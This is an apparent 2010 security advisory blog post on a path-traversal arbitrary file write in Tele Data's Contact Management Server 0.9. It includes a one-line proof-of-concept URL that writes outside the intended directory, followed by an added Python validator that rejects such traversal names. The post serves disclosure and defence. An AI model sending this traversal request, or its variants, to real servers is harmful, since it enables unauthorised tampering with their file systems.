This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Log in as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt
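
A server-side check that would reject the request above, as an added example (not code from the vendor or from the original post): it resolves FileName using Windows path rules and accepts it only if the result stays inside an export directory. BASE_DIR, resolve_save_path and check_request are hypothetical names, since the page does not describe the product's internals.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs

# Hypothetical export directory; the page does not say where SQL_Save writes.
BASE_DIR = r"C:\cms\exports"

def resolve_save_path(file_name, base_dir=BASE_DIR):
    """Return the absolute path for file_name inside base_dir, else raise ValueError."""
    if not file_name or "\x00" in file_name:
        raise ValueError("empty name or NUL byte")
    # Windows accepts both separators, so normalise before checking anything.
    name = file_name.replace("/", "\\")
    # A colon means a drive letter or an NTFS alternate data stream; a leading
    # backslash means a rooted or UNC path. None belongs in a save-file name.
    if ":" in name or name.startswith("\\"):
        raise ValueError("absolute, drive-qualified or stream path")
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, name))
    # Containment is tested on the normalised result, case-insensitively.
    if not ntpath.normcase(candidate).startswith(ntpath.normcase(base) + "\\"):
        raise ValueError("path escapes base directory")
    return candidate

def check_request(url):
    """Return (allowed, detail) for the FileName parameter of a request URL."""
    params = parse_qs(urlsplit(url).query)  # parse_qs also percent-decodes
    file_name = params.get("FileName", [""])[0]
    try:
        return True, resolve_save_path(file_name)
    except ValueError as exc:
        return False, str(exc)

if __name__ == "__main__":
    # First URL is the PoC request from the post; the others are constructed.
    samples = [
        r"http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt",
        "http://localhost/command.html?Cmd=SQL_Save&SQL=x&FileName=queries%5Creport.sql",
        "http://localhost/command.html?Cmd=SQL_Save&SQL=x&FileName=queries/..%5C..%5Cx.txt",
        "http://localhost/command.html?Cmd=SQL_Save&SQL=x&FileName=C:%5Cx.txt",
    ]
    for url in samples:
        print(check_request(url))
```

The containment test runs on the normalised path rather than on the raw parameter, so mixed separators and percent-encoded backslashes are handled the same way as the literal `..\` sequences in the PoC.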
